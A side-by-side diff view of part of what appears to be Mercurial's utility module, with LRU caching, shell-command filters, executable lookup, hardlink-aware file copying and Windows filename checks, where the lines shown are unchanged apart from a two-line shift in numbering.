1348 if self._size < self._capacity:
1346 if self._size < self._capacity:
1349 node = self._addcapacity()
1347 node = self._addcapacity()
1350 else:
1348 else:
1351 # Grab the last/oldest item.
1349 # Grab the last/oldest item.
1352 node = self._head.prev
1350 node = self._head.prev
1353
1351
1354 # At capacity. Kill the old entry.
1352 # At capacity. Kill the old entry.
1355 if node.key is not _notset:
1353 if node.key is not _notset:
1356 del self._cache[node.key]
1354 del self._cache[node.key]
1357
1355
1358 node.key = k
1356 node.key = k
1359 node.value = v
1357 node.value = v
1360 self._cache[k] = node
1358 self._cache[k] = node
1361 # And mark it as newest entry. No need to adjust order since it
1359 # And mark it as newest entry. No need to adjust order since it
1362 # is already self._head.prev.
1360 # is already self._head.prev.
1363 self._head = node
1361 self._head = node
1364
1362
1365 def __delitem__(self, k):
1363 def __delitem__(self, k):
1366 node = self._cache.pop(k)
1364 node = self._cache.pop(k)
1367 node.markempty()
1365 node.markempty()
1368
1366
1369 # Temporarily mark as newest item before re-adjusting head to make
1367 # Temporarily mark as newest item before re-adjusting head to make
1370 # this node the oldest item.
1368 # this node the oldest item.
1371 self._movetohead(node)
1369 self._movetohead(node)
1372 self._head = node.next
1370 self._head = node.next
1373
1371
1374 # Additional dict methods.
1372 # Additional dict methods.
1375
1373
1376 def get(self, k, default=None):
1374 def get(self, k, default=None):
1377 try:
1375 try:
1378 return self._cache[k].value
1376 return self._cache[k].value
1379 except KeyError:
1377 except KeyError:
1380 return default
1378 return default
1381
1379
1382 def clear(self):
1380 def clear(self):
1383 n = self._head
1381 n = self._head
1384 while n.key is not _notset:
1382 while n.key is not _notset:
1385 n.markempty()
1383 n.markempty()
1386 n = n.next
1384 n = n.next
1387
1385
1388 self._cache.clear()
1386 self._cache.clear()
1389
1387
1390 def copy(self):
1388 def copy(self):
1391 result = lrucachedict(self._capacity)
1389 result = lrucachedict(self._capacity)
1392 n = self._head.prev
1390 n = self._head.prev
1393 # Iterate in oldest-to-newest order, so the copy has the right ordering
1391 # Iterate in oldest-to-newest order, so the copy has the right ordering
1394 for i in range(len(self._cache)):
1392 for i in range(len(self._cache)):
1395 result[n.key] = n.value
1393 result[n.key] = n.value
1396 n = n.prev
1394 n = n.prev
1397 return result
1395 return result
1398
1396
1399 def _movetohead(self, node):
1397 def _movetohead(self, node):
1400 """Mark a node as the newest, making it the new head.
1398 """Mark a node as the newest, making it the new head.
1401
1399
1402 When a node is accessed, it becomes the freshest entry in the LRU
1400 When a node is accessed, it becomes the freshest entry in the LRU
1403 list, which is denoted by self._head.
1401 list, which is denoted by self._head.
1404
1402
1405 Visually, let's make ``N`` the new head node (* denotes head):
1403 Visually, let's make ``N`` the new head node (* denotes head):
1406
1404
1407 previous/oldest <-> head <-> next/next newest
1405 previous/oldest <-> head <-> next/next newest
1408
1406
1409 ----<->--- A* ---<->-----
1407 ----<->--- A* ---<->-----
1410 | |
1408 | |
1411 E <-> D <-> N <-> C <-> B
1409 E <-> D <-> N <-> C <-> B
1412
1410
1413 To:
1411 To:
1414
1412
1415 ----<->--- N* ---<->-----
1413 ----<->--- N* ---<->-----
1416 | |
1414 | |
1417 E <-> D <-> C <-> B <-> A
1415 E <-> D <-> C <-> B <-> A
1418
1416
1419 This requires the following moves:
1417 This requires the following moves:
1420
1418
1421 C.next = D (node.prev.next = node.next)
1419 C.next = D (node.prev.next = node.next)
1422 D.prev = C (node.next.prev = node.prev)
1420 D.prev = C (node.next.prev = node.prev)
1423 E.next = N (head.prev.next = node)
1421 E.next = N (head.prev.next = node)
1424 N.prev = E (node.prev = head.prev)
1422 N.prev = E (node.prev = head.prev)
1425 N.next = A (node.next = head)
1423 N.next = A (node.next = head)
1426 A.prev = N (head.prev = node)
1424 A.prev = N (head.prev = node)
1427 """
1425 """
1428 head = self._head
1426 head = self._head
1429 # C.next = D
1427 # C.next = D
1430 node.prev.next = node.next
1428 node.prev.next = node.next
1431 # D.prev = C
1429 # D.prev = C
1432 node.next.prev = node.prev
1430 node.next.prev = node.prev
1433 # N.prev = E
1431 # N.prev = E
1434 node.prev = head.prev
1432 node.prev = head.prev
1435 # N.next = A
1433 # N.next = A
1436 # It is tempting to do just "head" here, however if node is
1434 # It is tempting to do just "head" here, however if node is
1437 # adjacent to head, this will do bad things.
1435 # adjacent to head, this will do bad things.
1438 node.next = head.prev.next
1436 node.next = head.prev.next
1439 # E.next = N
1437 # E.next = N
1440 node.next.prev = node
1438 node.next.prev = node
1441 # A.prev = N
1439 # A.prev = N
1442 node.prev.next = node
1440 node.prev.next = node
1443
1441
1444 self._head = node
1442 self._head = node
1445
1443
1446 def _addcapacity(self):
1444 def _addcapacity(self):
1447 """Add a node to the circular linked list.
1445 """Add a node to the circular linked list.
1448
1446
1449 The new node is inserted before the head node.
1447 The new node is inserted before the head node.
1450 """
1448 """
1451 head = self._head
1449 head = self._head
1452 node = _lrucachenode()
1450 node = _lrucachenode()
1453 head.prev.next = node
1451 head.prev.next = node
1454 node.prev = head.prev
1452 node.prev = head.prev
1455 node.next = head
1453 node.next = head
1456 head.prev = node
1454 head.prev = node
1457 self._size += 1
1455 self._size += 1
1458 return node
1456 return node
1459
1457
1460 def lrucachefunc(func):
1458 def lrucachefunc(func):
1461 '''cache most recent results of function calls'''
1459 '''cache most recent results of function calls'''
1462 cache = {}
1460 cache = {}
1463 order = collections.deque()
1461 order = collections.deque()
1464 if func.__code__.co_argcount == 1:
1462 if func.__code__.co_argcount == 1:
1465 def f(arg):
1463 def f(arg):
1466 if arg not in cache:
1464 if arg not in cache:
1467 if len(cache) > 20:
1465 if len(cache) > 20:
1468 del cache[order.popleft()]
1466 del cache[order.popleft()]
1469 cache[arg] = func(arg)
1467 cache[arg] = func(arg)
1470 else:
1468 else:
1471 order.remove(arg)
1469 order.remove(arg)
1472 order.append(arg)
1470 order.append(arg)
1473 return cache[arg]
1471 return cache[arg]
1474 else:
1472 else:
1475 def f(*args):
1473 def f(*args):
1476 if args not in cache:
1474 if args not in cache:
1477 if len(cache) > 20:
1475 if len(cache) > 20:
1478 del cache[order.popleft()]
1476 del cache[order.popleft()]
1479 cache[args] = func(*args)
1477 cache[args] = func(*args)
1480 else:
1478 else:
1481 order.remove(args)
1479 order.remove(args)
1482 order.append(args)
1480 order.append(args)
1483 return cache[args]
1481 return cache[args]
1484
1482
1485 return f
1483 return f
1486
1484
1487 class propertycache(object):
1485 class propertycache(object):
1488 def __init__(self, func):
1486 def __init__(self, func):
1489 self.func = func
1487 self.func = func
1490 self.name = func.__name__
1488 self.name = func.__name__
1491 def __get__(self, obj, type=None):
1489 def __get__(self, obj, type=None):
1492 result = self.func(obj)
1490 result = self.func(obj)
1493 self.cachevalue(obj, result)
1491 self.cachevalue(obj, result)
1494 return result
1492 return result
1495
1493
1496 def cachevalue(self, obj, value):
1494 def cachevalue(self, obj, value):
1497 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1495 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1498 obj.__dict__[self.name] = value
1496 obj.__dict__[self.name] = value
1499
1497
1500 def clearcachedproperty(obj, prop):
1498 def clearcachedproperty(obj, prop):
1501 '''clear a cached property value, if one has been set'''
1499 '''clear a cached property value, if one has been set'''
1502 if prop in obj.__dict__:
1500 if prop in obj.__dict__:
1503 del obj.__dict__[prop]
1501 del obj.__dict__[prop]
1504
1502
1505 def pipefilter(s, cmd):
1503 def pipefilter(s, cmd):
1506 '''filter string S through command CMD, returning its output'''
1504 '''filter string S through command CMD, returning its output'''
1507 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1505 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1508 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1506 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
1509 pout, perr = p.communicate(s)
1507 pout, perr = p.communicate(s)
1510 return pout
1508 return pout
1511
1509
1512 def tempfilter(s, cmd):
1510 def tempfilter(s, cmd):
1513 '''filter string S through a pair of temporary files with CMD.
1511 '''filter string S through a pair of temporary files with CMD.
1514 CMD is used as a template to create the real command to be run,
1512 CMD is used as a template to create the real command to be run,
1515 with the strings INFILE and OUTFILE replaced by the real names of
1513 with the strings INFILE and OUTFILE replaced by the real names of
1516 the temporary files generated.'''
1514 the temporary files generated.'''
1517 inname, outname = None, None
1515 inname, outname = None, None
1518 try:
1516 try:
1519 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1517 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
1520 fp = os.fdopen(infd, r'wb')
1518 fp = os.fdopen(infd, r'wb')
1521 fp.write(s)
1519 fp.write(s)
1522 fp.close()
1520 fp.close()
1523 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1521 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
1524 os.close(outfd)
1522 os.close(outfd)
1525 cmd = cmd.replace('INFILE', inname)
1523 cmd = cmd.replace('INFILE', inname)
1526 cmd = cmd.replace('OUTFILE', outname)
1524 cmd = cmd.replace('OUTFILE', outname)
1527 code = os.system(cmd)
1525 code = os.system(cmd)
1528 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1526 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1529 code = 0
1527 code = 0
1530 if code:
1528 if code:
1531 raise error.Abort(_("command '%s' failed: %s") %
1529 raise error.Abort(_("command '%s' failed: %s") %
1532 (cmd, explainexit(code)))
1530 (cmd, explainexit(code)))
1533 return readfile(outname)
1531 return readfile(outname)
1534 finally:
1532 finally:
1535 try:
1533 try:
1536 if inname:
1534 if inname:
1537 os.unlink(inname)
1535 os.unlink(inname)
1538 except OSError:
1536 except OSError:
1539 pass
1537 pass
1540 try:
1538 try:
1541 if outname:
1539 if outname:
1542 os.unlink(outname)
1540 os.unlink(outname)
1543 except OSError:
1541 except OSError:
1544 pass
1542 pass
1545
1543
1546 filtertable = {
1544 filtertable = {
1547 'tempfile:': tempfilter,
1545 'tempfile:': tempfilter,
1548 'pipe:': pipefilter,
1546 'pipe:': pipefilter,
1549 }
1547 }
1550
1548
1551 def filter(s, cmd):
1549 def filter(s, cmd):
1552 "filter a string through a command that transforms its input to its output"
1550 "filter a string through a command that transforms its input to its output"
1553 for name, fn in filtertable.iteritems():
1551 for name, fn in filtertable.iteritems():
1554 if cmd.startswith(name):
1552 if cmd.startswith(name):
1555 return fn(s, cmd[len(name):].lstrip())
1553 return fn(s, cmd[len(name):].lstrip())
1556 return pipefilter(s, cmd)
1554 return pipefilter(s, cmd)
1557
1555
1558 def increasingchunks(source, min=1024, max=65536):
1556 def increasingchunks(source, min=1024, max=65536):
1559 '''return no less than min bytes per chunk while data remains,
1557 '''return no less than min bytes per chunk while data remains,
1560 doubling min after each chunk until it reaches max'''
1558 doubling min after each chunk until it reaches max'''
1561 def log2(x):
1559 def log2(x):
1562 if not x:
1560 if not x:
1563 return 0
1561 return 0
1564 i = 0
1562 i = 0
1565 while x:
1563 while x:
1566 x >>= 1
1564 x >>= 1
1567 i += 1
1565 i += 1
1568 return i - 1
1566 return i - 1
1569
1567
1570 buf = []
1568 buf = []
1571 blen = 0
1569 blen = 0
1572 for chunk in source:
1570 for chunk in source:
1573 buf.append(chunk)
1571 buf.append(chunk)
1574 blen += len(chunk)
1572 blen += len(chunk)
1575 if blen >= min:
1573 if blen >= min:
1576 if min < max:
1574 if min < max:
1577 min = min << 1
1575 min = min << 1
1578 nmin = 1 << log2(blen)
1576 nmin = 1 << log2(blen)
1579 if nmin > min:
1577 if nmin > min:
1580 min = nmin
1578 min = nmin
1581 if min > max:
1579 if min > max:
1582 min = max
1580 min = max
1583 yield ''.join(buf)
1581 yield ''.join(buf)
1584 blen = 0
1582 blen = 0
1585 buf = []
1583 buf = []
1586 if buf:
1584 if buf:
1587 yield ''.join(buf)
1585 yield ''.join(buf)
1588
1586
1589 def always(fn):
1587 def always(fn):
1590 return True
1588 return True
1591
1589
1592 def never(fn):
1590 def never(fn):
1593 return False
1591 return False
1594
1592
1595 def nogc(func):
1593 def nogc(func):
1596 """disable garbage collector
1594 """disable garbage collector
1597
1595
1598 Python's garbage collector triggers a GC each time a certain number of
1596 Python's garbage collector triggers a GC each time a certain number of
1599 container objects (the number being defined by gc.get_threshold()) are
1597 container objects (the number being defined by gc.get_threshold()) are
1600 allocated even when marked not to be tracked by the collector. Tracking has
1598 allocated even when marked not to be tracked by the collector. Tracking has
1601 no effect on when GCs are triggered, only on what objects the GC looks
1599 no effect on when GCs are triggered, only on what objects the GC looks
1602 into. As a workaround, disable GC while building complex (huge)
1600 into. As a workaround, disable GC while building complex (huge)
1603 containers.
1601 containers.
1604
1602
1605 This garbage collector issue have been fixed in 2.7. But it still affect
1603 This garbage collector issue have been fixed in 2.7. But it still affect
1606 CPython's performance.
1604 CPython's performance.
1607 """
1605 """
1608 def wrapper(*args, **kwargs):
1606 def wrapper(*args, **kwargs):
1609 gcenabled = gc.isenabled()
1607 gcenabled = gc.isenabled()
1610 gc.disable()
1608 gc.disable()
1611 try:
1609 try:
1612 return func(*args, **kwargs)
1610 return func(*args, **kwargs)
1613 finally:
1611 finally:
1614 if gcenabled:
1612 if gcenabled:
1615 gc.enable()
1613 gc.enable()
1616 return wrapper
1614 return wrapper
1617
1615
1618 if pycompat.ispypy:
1616 if pycompat.ispypy:
1619 # PyPy runs slower with gc disabled
1617 # PyPy runs slower with gc disabled
1620 nogc = lambda x: x
1618 nogc = lambda x: x
1621
1619
1622 def pathto(root, n1, n2):
1620 def pathto(root, n1, n2):
1623 '''return the relative path from one place to another.
1621 '''return the relative path from one place to another.
1624 root should use os.sep to separate directories
1622 root should use os.sep to separate directories
1625 n1 should use os.sep to separate directories
1623 n1 should use os.sep to separate directories
1626 n2 should use "/" to separate directories
1624 n2 should use "/" to separate directories
1627 returns an os.sep-separated path.
1625 returns an os.sep-separated path.
1628
1626
1629 If n1 is a relative path, it's assumed it's
1627 If n1 is a relative path, it's assumed it's
1630 relative to root.
1628 relative to root.
1631 n2 should always be relative to root.
1629 n2 should always be relative to root.
1632 '''
1630 '''
1633 if not n1:
1631 if not n1:
1634 return localpath(n2)
1632 return localpath(n2)
1635 if os.path.isabs(n1):
1633 if os.path.isabs(n1):
1636 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1634 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1637 return os.path.join(root, localpath(n2))
1635 return os.path.join(root, localpath(n2))
1638 n2 = '/'.join((pconvert(root), n2))
1636 n2 = '/'.join((pconvert(root), n2))
1639 a, b = splitpath(n1), n2.split('/')
1637 a, b = splitpath(n1), n2.split('/')
1640 a.reverse()
1638 a.reverse()
1641 b.reverse()
1639 b.reverse()
1642 while a and b and a[-1] == b[-1]:
1640 while a and b and a[-1] == b[-1]:
1643 a.pop()
1641 a.pop()
1644 b.pop()
1642 b.pop()
1645 b.reverse()
1643 b.reverse()
1646 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1644 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1647
1645
1648 def mainfrozen():
1646 def mainfrozen():
1649 """return True if we are a frozen executable.
1647 """return True if we are a frozen executable.
1650
1648
1651 The code supports py2exe (most common, Windows only) and tools/freeze
1649 The code supports py2exe (most common, Windows only) and tools/freeze
1652 (portable, not much used).
1650 (portable, not much used).
1653 """
1651 """
1654 return (safehasattr(sys, "frozen") or # new py2exe
1652 return (safehasattr(sys, "frozen") or # new py2exe
1655 safehasattr(sys, "importers") or # old py2exe
1653 safehasattr(sys, "importers") or # old py2exe
1656 imp.is_frozen(u"__main__")) # tools/freeze
1654 imp.is_frozen(u"__main__")) # tools/freeze
1657
1655
1658 # the location of data files matching the source code
1656 # the location of data files matching the source code
1659 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1657 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1660 # executable version (py2exe) doesn't support __file__
1658 # executable version (py2exe) doesn't support __file__
1661 datapath = os.path.dirname(pycompat.sysexecutable)
1659 datapath = os.path.dirname(pycompat.sysexecutable)
1662 else:
1660 else:
1663 datapath = os.path.dirname(pycompat.fsencode(__file__))
1661 datapath = os.path.dirname(pycompat.fsencode(__file__))
1664
1662
1665 i18n.setdatapath(datapath)
1663 i18n.setdatapath(datapath)
1666
1664
1667 _hgexecutable = None
1665 _hgexecutable = None
1668
1666
1669 def hgexecutable():
1667 def hgexecutable():
1670 """return location of the 'hg' executable.
1668 """return location of the 'hg' executable.
1671
1669
1672 Defaults to $HG or 'hg' in the search path.
1670 Defaults to $HG or 'hg' in the search path.
1673 """
1671 """
1674 if _hgexecutable is None:
1672 if _hgexecutable is None:
1675 hg = encoding.environ.get('HG')
1673 hg = encoding.environ.get('HG')
1676 mainmod = sys.modules[r'__main__']
1674 mainmod = sys.modules[r'__main__']
1677 if hg:
1675 if hg:
1678 _sethgexecutable(hg)
1676 _sethgexecutable(hg)
1679 elif mainfrozen():
1677 elif mainfrozen():
1680 if getattr(sys, 'frozen', None) == 'macosx_app':
1678 if getattr(sys, 'frozen', None) == 'macosx_app':
1681 # Env variable set by py2app
1679 # Env variable set by py2app
1682 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1680 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1683 else:
1681 else:
1684 _sethgexecutable(pycompat.sysexecutable)
1682 _sethgexecutable(pycompat.sysexecutable)
1685 elif (os.path.basename(
1683 elif (os.path.basename(
1686 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1684 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1687 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1685 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1688 else:
1686 else:
1689 exe = findexe('hg') or os.path.basename(sys.argv[0])
1687 exe = findexe('hg') or os.path.basename(sys.argv[0])
1690 _sethgexecutable(exe)
1688 _sethgexecutable(exe)
1691 return _hgexecutable
1689 return _hgexecutable
1692
1690
1693 def _sethgexecutable(path):
1691 def _sethgexecutable(path):
1694 """set location of the 'hg' executable"""
1692 """set location of the 'hg' executable"""
1695 global _hgexecutable
1693 global _hgexecutable
1696 _hgexecutable = path
1694 _hgexecutable = path
1697
1695
1698 def _testfileno(f, stdf):
1696 def _testfileno(f, stdf):
1699 fileno = getattr(f, 'fileno', None)
1697 fileno = getattr(f, 'fileno', None)
1700 try:
1698 try:
1701 return fileno and fileno() == stdf.fileno()
1699 return fileno and fileno() == stdf.fileno()
1702 except io.UnsupportedOperation:
1700 except io.UnsupportedOperation:
1703 return False # fileno() raised UnsupportedOperation
1701 return False # fileno() raised UnsupportedOperation
1704
1702
1705 def isstdin(f):
1703 def isstdin(f):
1706 return _testfileno(f, sys.__stdin__)
1704 return _testfileno(f, sys.__stdin__)
1707
1705
1708 def isstdout(f):
1706 def isstdout(f):
1709 return _testfileno(f, sys.__stdout__)
1707 return _testfileno(f, sys.__stdout__)
1710
1708
1711 def shellenviron(environ=None):
1709 def shellenviron(environ=None):
1712 """return environ with optional override, useful for shelling out"""
1710 """return environ with optional override, useful for shelling out"""
1713 def py2shell(val):
1711 def py2shell(val):
1714 'convert python object into string that is useful to shell'
1712 'convert python object into string that is useful to shell'
1715 if val is None or val is False:
1713 if val is None or val is False:
1716 return '0'
1714 return '0'
1717 if val is True:
1715 if val is True:
1718 return '1'
1716 return '1'
1719 return pycompat.bytestr(val)
1717 return pycompat.bytestr(val)
1720 env = dict(encoding.environ)
1718 env = dict(encoding.environ)
1721 if environ:
1719 if environ:
1722 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1720 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1723 env['HG'] = hgexecutable()
1721 env['HG'] = hgexecutable()
1724 return env
1722 return env
1725
1723
1726 def system(cmd, environ=None, cwd=None, out=None):
1724 def system(cmd, environ=None, cwd=None, out=None):
1727 '''enhanced shell command execution.
1725 '''enhanced shell command execution.
1728 run with environment maybe modified, maybe in different dir.
1726 run with environment maybe modified, maybe in different dir.
1729
1727
1730 if out is specified, it is assumed to be a file-like object that has a
1728 if out is specified, it is assumed to be a file-like object that has a
1731 write() method. stdout and stderr will be redirected to out.'''
1729 write() method. stdout and stderr will be redirected to out.'''
1732 try:
1730 try:
1733 stdout.flush()
1731 stdout.flush()
1734 except Exception:
1732 except Exception:
1735 pass
1733 pass
1736 cmd = quotecommand(cmd)
1734 cmd = quotecommand(cmd)
1737 env = shellenviron(environ)
1735 env = shellenviron(environ)
1738 if out is None or isstdout(out):
1736 if out is None or isstdout(out):
1739 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1737 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1740 env=env, cwd=cwd)
1738 env=env, cwd=cwd)
1741 else:
1739 else:
1742 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1740 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1743 env=env, cwd=cwd, stdout=subprocess.PIPE,
1741 env=env, cwd=cwd, stdout=subprocess.PIPE,
1744 stderr=subprocess.STDOUT)
1742 stderr=subprocess.STDOUT)
1745 for line in iter(proc.stdout.readline, ''):
1743 for line in iter(proc.stdout.readline, ''):
1746 out.write(line)
1744 out.write(line)
1747 proc.wait()
1745 proc.wait()
1748 rc = proc.returncode
1746 rc = proc.returncode
1749 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1747 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1750 rc = 0
1748 rc = 0
1751 return rc
1749 return rc
1752
1750
1753 def checksignature(func):
1751 def checksignature(func):
1754 '''wrap a function with code to check for calling errors'''
1752 '''wrap a function with code to check for calling errors'''
1755 def check(*args, **kwargs):
1753 def check(*args, **kwargs):
1756 try:
1754 try:
1757 return func(*args, **kwargs)
1755 return func(*args, **kwargs)
1758 except TypeError:
1756 except TypeError:
1759 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1757 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1760 raise error.SignatureError
1758 raise error.SignatureError
1761 raise
1759 raise
1762
1760
1763 return check
1761 return check
1764
1762
1765 # a whilelist of known filesystems where hardlink works reliably
1763 # a whilelist of known filesystems where hardlink works reliably
1766 _hardlinkfswhitelist = {
1764 _hardlinkfswhitelist = {
1767 'btrfs',
1765 'btrfs',
1768 'ext2',
1766 'ext2',
1769 'ext3',
1767 'ext3',
1770 'ext4',
1768 'ext4',
1771 'hfs',
1769 'hfs',
1772 'jfs',
1770 'jfs',
1773 'NTFS',
1771 'NTFS',
1774 'reiserfs',
1772 'reiserfs',
1775 'tmpfs',
1773 'tmpfs',
1776 'ufs',
1774 'ufs',
1777 'xfs',
1775 'xfs',
1778 'zfs',
1776 'zfs',
1779 }
1777 }
1780
1778
1781 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1779 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1782 '''copy a file, preserving mode and optionally other stat info like
1780 '''copy a file, preserving mode and optionally other stat info like
1783 atime/mtime
1781 atime/mtime
1784
1782
1785 checkambig argument is used with filestat, and is useful only if
1783 checkambig argument is used with filestat, and is useful only if
1786 destination file is guarded by any lock (e.g. repo.lock or
1784 destination file is guarded by any lock (e.g. repo.lock or
1787 repo.wlock).
1785 repo.wlock).
1788
1786
1789 copystat and checkambig should be exclusive.
1787 copystat and checkambig should be exclusive.
1790 '''
1788 '''
1791 assert not (copystat and checkambig)
1789 assert not (copystat and checkambig)
1792 oldstat = None
1790 oldstat = None
1793 if os.path.lexists(dest):
1791 if os.path.lexists(dest):
1794 if checkambig:
1792 if checkambig:
1795 oldstat = checkambig and filestat.frompath(dest)
1793 oldstat = checkambig and filestat.frompath(dest)
1796 unlink(dest)
1794 unlink(dest)
1797 if hardlink:
1795 if hardlink:
1798 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1796 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1799 # unless we are confident that dest is on a whitelisted filesystem.
1797 # unless we are confident that dest is on a whitelisted filesystem.
1800 try:
1798 try:
1801 fstype = getfstype(os.path.dirname(dest))
1799 fstype = getfstype(os.path.dirname(dest))
1802 except OSError:
1800 except OSError:
1803 fstype = None
1801 fstype = None
1804 if fstype not in _hardlinkfswhitelist:
1802 if fstype not in _hardlinkfswhitelist:
1805 hardlink = False
1803 hardlink = False
1806 if hardlink:
1804 if hardlink:
1807 try:
1805 try:
1808 oslink(src, dest)
1806 oslink(src, dest)
1809 return
1807 return
1810 except (IOError, OSError):
1808 except (IOError, OSError):
1811 pass # fall back to normal copy
1809 pass # fall back to normal copy
1812 if os.path.islink(src):
1810 if os.path.islink(src):
1813 os.symlink(os.readlink(src), dest)
1811 os.symlink(os.readlink(src), dest)
1814 # copytime is ignored for symlinks, but in general copytime isn't needed
1812 # copytime is ignored for symlinks, but in general copytime isn't needed
1815 # for them anyway
1813 # for them anyway
1816 else:
1814 else:
1817 try:
1815 try:
1818 shutil.copyfile(src, dest)
1816 shutil.copyfile(src, dest)
1819 if copystat:
1817 if copystat:
1820 # copystat also copies mode
1818 # copystat also copies mode
1821 shutil.copystat(src, dest)
1819 shutil.copystat(src, dest)
1822 else:
1820 else:
1823 shutil.copymode(src, dest)
1821 shutil.copymode(src, dest)
1824 if oldstat and oldstat.stat:
1822 if oldstat and oldstat.stat:
1825 newstat = filestat.frompath(dest)
1823 newstat = filestat.frompath(dest)
1826 if newstat.isambig(oldstat):
1824 if newstat.isambig(oldstat):
1827 # stat of copied file is ambiguous to original one
1825 # stat of copied file is ambiguous to original one
1828 advanced = (
1826 advanced = (
1829 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1827 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1830 os.utime(dest, (advanced, advanced))
1828 os.utime(dest, (advanced, advanced))
1831 except shutil.Error as inst:
1829 except shutil.Error as inst:
1832 raise error.Abort(str(inst))
1830 raise error.Abort(str(inst))
1833
1831
1834 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1832 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1835 """Copy a directory tree using hardlinks if possible."""
1833 """Copy a directory tree using hardlinks if possible."""
1836 num = 0
1834 num = 0
1837
1835
1838 gettopic = lambda: hardlink and _('linking') or _('copying')
1836 gettopic = lambda: hardlink and _('linking') or _('copying')
1839
1837
1840 if os.path.isdir(src):
1838 if os.path.isdir(src):
1841 if hardlink is None:
1839 if hardlink is None:
1842 hardlink = (os.stat(src).st_dev ==
1840 hardlink = (os.stat(src).st_dev ==
1843 os.stat(os.path.dirname(dst)).st_dev)
1841 os.stat(os.path.dirname(dst)).st_dev)
1844 topic = gettopic()
1842 topic = gettopic()
1845 os.mkdir(dst)
1843 os.mkdir(dst)
1846 for name, kind in listdir(src):
1844 for name, kind in listdir(src):
1847 srcname = os.path.join(src, name)
1845 srcname = os.path.join(src, name)
1848 dstname = os.path.join(dst, name)
1846 dstname = os.path.join(dst, name)
1849 def nprog(t, pos):
1847 def nprog(t, pos):
1850 if pos is not None:
1848 if pos is not None:
1851 return progress(t, pos + num)
1849 return progress(t, pos + num)
1852 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1850 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1853 num += n
1851 num += n
1854 else:
1852 else:
1855 if hardlink is None:
1853 if hardlink is None:
1856 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1854 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1857 os.stat(os.path.dirname(dst)).st_dev)
1855 os.stat(os.path.dirname(dst)).st_dev)
1858 topic = gettopic()
1856 topic = gettopic()
1859
1857
1860 if hardlink:
1858 if hardlink:
1861 try:
1859 try:
1862 oslink(src, dst)
1860 oslink(src, dst)
1863 except (IOError, OSError):
1861 except (IOError, OSError):
1864 hardlink = False
1862 hardlink = False
1865 shutil.copy(src, dst)
1863 shutil.copy(src, dst)
1866 else:
1864 else:
1867 shutil.copy(src, dst)
1865 shutil.copy(src, dst)
1868 num += 1
1866 num += 1
1869 progress(topic, num)
1867 progress(topic, num)
1870 progress(topic, None)
1868 progress(topic, None)
1871
1869
1872 return hardlink, num
1870 return hardlink, num
1873
1871
1874 _winreservednames = {
1872 _winreservednames = {
1875 'con', 'prn', 'aux', 'nul',
1873 'con', 'prn', 'aux', 'nul',
1876 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1874 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1877 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1875 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1878 }
1876 }
1879 _winreservedchars = ':*?"<>|'
1877 _winreservedchars = ':*?"<>|'
1880 def checkwinfilename(path):
1878 def checkwinfilename(path):
1881 r'''Check that the base-relative path is a valid filename on Windows.
1879 r'''Check that the base-relative path is a valid filename on Windows.
1882 Returns None if the path is ok, or a UI string describing the problem.
1880 Returns None if the path is ok, or a UI string describing the problem.
1883
1881
1884 >>> checkwinfilename(b"just/a/normal/path")
1882 >>> checkwinfilename(b"just/a/normal/path")
1885 >>> checkwinfilename(b"foo/bar/con.xml")
1883 >>> checkwinfilename(b"foo/bar/con.xml")
1886 "filename contains 'con', which is reserved on Windows"
1884 "filename contains 'con', which is reserved on Windows"
1887 >>> checkwinfilename(b"foo/con.xml/bar")
1885 >>> checkwinfilename(b"foo/con.xml/bar")
1888 "filename contains 'con', which is reserved on Windows"
1886 "filename contains 'con', which is reserved on Windows"
